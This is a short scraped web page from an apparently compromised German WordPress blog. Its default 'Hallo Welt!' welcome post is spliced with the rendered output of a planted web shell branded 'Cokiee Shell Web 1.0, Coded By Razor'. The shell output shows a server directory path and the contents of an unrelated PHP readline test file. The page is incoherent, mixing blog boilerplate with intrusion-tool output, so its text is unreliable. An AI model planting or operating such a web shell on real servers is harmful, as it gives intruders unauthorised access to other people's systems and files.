Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/readline/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/readline/tests/readline_completion_function_001.phpt |
--TEST-- readline_completion_function(): Basic test --SKIPIF-- <?php if (!extension_loaded("readline")) die("skip"); ?> --FILE-- <?php function foo() { } $data = array( 'foo', 'strtolower', 1, 1.1231 ); foreach ($data as $callback) { readline_completion_function($callback); } ?> --EXPECTF-- Warning: readline_completion_function(): 1 is not callable in %s on line %d Warning: readline_completion_function(): 1.1231 is not callable in %s on line %d
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare